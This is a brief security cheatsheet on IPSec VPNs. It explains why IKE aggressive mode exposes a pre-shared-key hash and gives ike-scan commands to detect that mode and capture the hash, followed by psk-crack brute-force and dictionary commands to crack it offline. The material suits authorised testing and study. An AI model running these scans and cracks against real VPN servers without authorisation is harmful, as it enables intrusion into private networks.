# IPSec > [!note] > Adapted from [slyth11907 / Cheatsheets / Cheatsheet_IKEScan.txt](https://github.com/slyth11907/Cheatsheets/blob/master/Cheatsheet_IKEScan.txt). In IKE aggressive mode the authentication hash based on a preshared key (PSK) is transmitted as response to the initial packet of a VPN client that wants to establish an IPSec Tunnel (`Hash_R`). This hash is not encrypted (in main mode the hash *is* encrypted). The ike-scan tool can be used to test if an IPSec VPN server is using IKE in aggressive mode: ```bash sudo ike-scan -A $IP_ADDRESS ``` If aggressive mode is in use, then ike-scan can be used to save the initial exchange for offline cracking: ```bash sudo ike-scan -A $IP_ADDRESS --id=$ID -P$KEY_FILE ``` psk-crack can then be used to (attempt) to crack the resulting `$KEY_FILE`. ```bash # Attempt to brute-force all keys up to $KEY_LENGTH using # characters from $CHARSET (by default $CHARSET is numbers and # lowercase ASCII characters). # psk-crack --charset="$CHARSET" -b $KEY_LENGTH $KEY_FILE # Attempt to crack the PSK using a dictionary. # psk-crack -d $WORDLIST_FILE $KEY_FILE ```